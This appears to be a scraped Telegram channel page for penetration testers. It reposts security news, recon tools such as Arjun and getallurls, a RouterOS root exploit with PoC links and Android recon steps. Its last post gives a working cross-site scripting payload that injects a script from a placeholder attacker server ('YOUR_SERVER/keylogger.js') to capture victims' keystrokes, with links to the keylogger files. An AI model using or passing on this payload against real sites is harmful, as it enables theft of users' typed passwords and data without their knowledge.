Pentester
2.95K subscribers
120 photos
3 videos
163 files
2.77K links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analisys
- Web Security
Download Telegram
Burp Suite Pro 2.1.05 released, with experimental support for using Burp's embedded Chromium browser to perform all navigation while scanning. This new approach will provide a robust basis for future capabilities. Feedback welcome if you want to play now.
https://t.co/UPYjGMibnE
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
https://t.co/34znlumYwM

Quick script that I use religiously for content discovery.
So this filing in security research company CorelliumHQ vs Apple has some pretty interesting details. And it doesn't exactly look good for Apple. https://t.co/KNl2z3Uk8l
RouterOS : Chain to Root - DNS Request to a Root Busybox Shell : https://t.co/eDqnIDHKdV

Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)

PoC : https://t.co/IsCXSysp8j
Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : https://t.co/L14G2peGuW
WEIZZ: Automatic Grey-box Fuzzing for Structured Binary Formats
Target has an android app?

1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://t.co/PwIvyt9Uss

keylogger.js: https://t.co/g5HoTeA5z2